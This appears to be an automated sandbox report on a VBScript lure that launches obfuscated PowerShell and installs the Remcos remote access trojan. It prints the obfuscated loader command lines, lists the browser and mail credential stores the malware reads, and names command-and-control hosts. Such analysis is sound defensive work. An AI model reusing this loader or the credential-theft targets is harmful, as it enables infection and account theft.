              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredv
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredv
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredvJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredvJump to behavior
              Source: wab.exe, 00000009.00000003.2355239700.0000000006621000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000009.00000003.2367616246.000000000662C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2362636441.000000000662C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2423203936.000000000662C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,13_2_0041881C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword14_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7828, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSUJump to behavior
              Source: Yara matchFile source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              221
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              1
              Registry Run Keys / Startup Folder
              212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts112
              Command and Scripting Interpreter
              Login Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              19
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets121
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture12
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435459 Sample: REVISED NEW ORDER 7936-2024.vbs Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 56 paygateme.net 2->56 58 geoplugin.net 2->58 78 Multi AV Scanner detection for domain / URL 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Antivirus detection for URL or domain 2->82 84 8 other signatures 2->84 11 wscript.exe 1 2->11         started        signatures3 process4 file5 46 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 11->46 dropped 92 VBScript performs obfuscated calls to suspicious functions 11->92 94 Suspicious powershell command line found 11->94 96 Wscript starts Powershell (via cmd or directly) 11->96 98 3 other signatures 11->98 15 powershell.exe 14 19 11->15         started        signatures6 process7 dnsIp8 64 87.121.105.184, 49731, 49738, 80 NET1-ASBG Bulgaria 15->64 66 Suspicious powershell command line found 15->66 68 Very long command line found 15->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 15->70 19 powershell.exe 17 15->19         started        22 conhost.exe 15->22         started        24 cmd.exe 1 15->24         started        signatures9 process10 signatures11 86 Writes to foreign memory regions 19->86 88 Found suspicious powershell code related to unpacking or dynamic code loading 19->88 90 Hides threads from debuggers 19->90 26 wab.exe 5 227 19->26         started        31 cmd.exe 1 19->31         started        process12 dnsIp13 60 paygateme.net 146.70.57.34, 2286, 49740, 49741 TENET-1ZA United Kingdom 26->60 62 geoplugin.net 178.237.33.50, 49742, 80 ATOM86-ASATOM86NL Netherlands 26->62 48 C:\Users\user\...\time_20240502_220908.dat, data 26->48 dropped 50 C:\Users\user\...\time_20240502_220806.dat, data 26->50 dropped 52 C:\Users\user\...\time_20240502_220706.dat, data 26->52 dropped 54 207 other malicious files 26->54 dropped 100 Detected Remcos RAT 26->100 102 Maps a DLL or memory area into another process 26->102 104 Hides threads from debuggers 26->104 106 Installs a global keyboard hook 26->106 33 wab.exe 1 26->33         started        36 wab.exe 1 26->36         started        38 wab.exe 2 26->38         started        40 cmd.exe 1 26->40         started        file14 signatures15 process16 signatures17 72 Tries to steal Instant Messenger accounts or passwords 